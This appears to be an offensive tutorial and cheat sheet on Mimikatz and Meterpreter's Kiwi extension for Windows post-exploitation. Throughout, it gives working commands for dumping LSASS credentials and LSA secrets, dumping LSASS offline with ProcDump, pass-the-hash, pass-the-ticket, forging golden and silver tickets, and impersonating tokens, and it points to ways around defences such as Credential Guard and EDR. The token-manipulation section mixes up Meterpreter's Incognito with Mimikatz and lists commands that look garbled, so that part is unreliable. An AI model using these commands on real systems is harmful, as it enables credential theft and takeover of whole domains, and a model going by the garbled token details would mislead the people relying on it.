Mimikatz & Kiwi: Weaponizing Credentials in Windows
In the world of Windows post-exploitation, Mimikatz is your scalpel and Kiwi is your Swiss army knife. These tools help you extract, impersonate, and abuse credentials, from user hashes to domain secrets, in ways that can flip the whole network in your favor.
This guide breaks down how Mimikatz works, what Kiwi is, and how to use both effectively during real-world engagements and exam scenarios.
What Is Mimikatz?
Mimikatz is a post-exploitation tool developed by Benjamin Delpy (@gentilkiwi) that allows you to extract plaintext passwords, NTLM hashes, Kerberos tickets, and more from Windows memory.
It’s widely used in both red team operations and real-world attacks because it works directly with Windows authentication systems.
How Mimikatz Works
Mimikatz interacts directly with Windows subsystems like:
- LSASS (Local Security Authority Subsystem Service)
- WDigest
- SSP, TSPKG, and Kerberos authentication packages
These subsystems often store credentials or tickets in memory.
To run Mimikatz effectively, you need elevated privileges, either Administrator or SYSTEM.
Core Mimikatz Functions
1. Enable Debug Privileges
privilege::debug
# Grants the required permissions to access system processes like LSASS
2. Dump Credentials From LSASS
sekurlsa::logonpasswords
# Dumps usernames, plaintext passwords, NTLM hashes, and Kerberos tickets from memory
3. List Kerberos Tickets
sekurlsa::tickets
# Shows Kerberos tickets currently stored in memory
4. Pass-the-Hash (PTH)
sekurlsa::pth /user:Bob /domain:corp.local /ntlm:<NTLM_HASH> /run:cmd.exe
# Creates a new session as the specified user using their NTLM hash
5. Pass-the-Ticket (PTT)
kerberos::ptt <ticket.kirbi>
# Injects a forged or stolen Kerberos ticket into memory
6. Dump LSA Secrets
lsadump::lsa /inject
# Extracts LSA secrets like service account credentials and auto-logon passwords
Safer Approach: Offline Dumping
Uploading Mimikatz to a live host is noisy. Safer method: dump LSASS and analyze it offline.
Dump LSASS With ProcDump
procdump -ma lsass.exe lsass.dmp
# Dumps the memory of the LSASS process into a file
Analyze With Mimikatz
mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
# Loads the dump and extracts credentials offline
Golden and Silver Ticket Attacks
If you’ve compromised a Domain Controller and obtained the KRBTGT account’s hash, you can forge a Golden Ticket; a service account’s hash is enough to forge a Silver Ticket scoped to that service:
Golden Ticket
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt
# Grants a forged TGT that gives you Domain Admin access across the domain
Silver Ticket
kerberos::golden /user:svc /domain:corp.local /sid:S-1-5-21-... /rc4:<service_hash> /service:cifs /target:dc.corp.local /ptt
# Grants access to a specific service like CIFS (SMB) on a specific target
Mimikatz via Metasploit (Kiwi Module)
Kiwi is a port of Mimikatz built into Meterpreter, allowing in-memory credential dumping without uploading binaries.
Load Kiwi
load kiwi
# Loads the Kiwi extension inside Meterpreter
Dump All Credentials
creds_all
# Grabs credentials from memory
Dump NTLM Hashes
hashdump
# Dumps user password hashes from the SAM database
Kerberos Ticket Dump
kerberos_ticket_list
# Shows all Kerberos tickets on the system
Defenses That May Block Mimikatz
Be aware of protections that can block or hinder Mimikatz:
- LSASS Protected Process Light (PPL)
- Credential Guard
- WDigest disabled
- Event Logging
- AV/EDR integrations
Bypass techniques include dumping LSASS offline or using process injection tools.
Incognito Module – Token Manipulation in Mimikatz
The Incognito module in Mimikatz is used for managing and abusing access tokens on a compromised Windows system. Tokens represent a user’s security context — and if you’re holding a token, you can act like that user.
This technique is commonly used for privilege escalation or lateral movement, especially after you’ve compromised a system and want to move through the network without needing credentials.
🛑 Note: The incognito module used to be a part of older Mimikatz builds, but newer versions of Mimikatz don’t explicitly call it “Incognito” anymore — however, the token manipulation features still exist, just via different commands.
What Can You Do with Incognito/Token Commands?
- List tokens (delegation and impersonation)
- Impersonate a token
- Pass tokens to new sessions (e.g., spawn a shell as another user)
Commands
Below are common commands used for token manipulation in Mimikatz:
1. Load Mimikatz and elevate if needed:
privilege::debug
# Enables SeDebugPrivilege, which is required for many token-related tasks
2. List all available tokens:
token::list
# Shows all impersonation and delegation tokens on the system
3. Impersonate a token:
token::impersonate <TOKEN_ID>
# Replace <TOKEN_ID> with the ID from the token::list output
4. Spawn a shell with the impersonated token:
!cmd
# You now have a shell running as the impersonated user
Pro Tips
- Look for tokens belonging to Domain Admins or privileged accounts.
- Combine token impersonation with “MakeToken” for even more flexibility:
sekurlsa::logonpasswords
token::maketoken <domain>\<username> <password>
- This will make a new token using the supplied credentials.
In modern use, the sekurlsa module (for example sekurlsa::logonpasswords) and the token module are your go-to tools for token manipulation in Mimikatz. It’s a powerful way to move laterally or elevate privileges after an initial foothold.
Mimikatz Cheatsheet
| Objective | Command Example |
|---|---|
| Enable Debug Privileges | privilege::debug |
| Dump Plaintext Creds | sekurlsa::logonpasswords |
| Dump Kerberos Tickets | sekurlsa::tickets |
| Pass-the-Hash | sekurlsa::pth /user:... /ntlm:... /run:cmd.exe |
| Inject Kerberos Ticket | kerberos::ptt <ticket.kirbi> |
| Golden Ticket | kerberos::golden /user:... /krbtgt:<hash> /ptt |
| Dump LSA Secrets | lsadump::lsa /inject |
| Meterpreter: Load Kiwi | load kiwi |
| Meterpreter: Dump All Creds | creds_all |
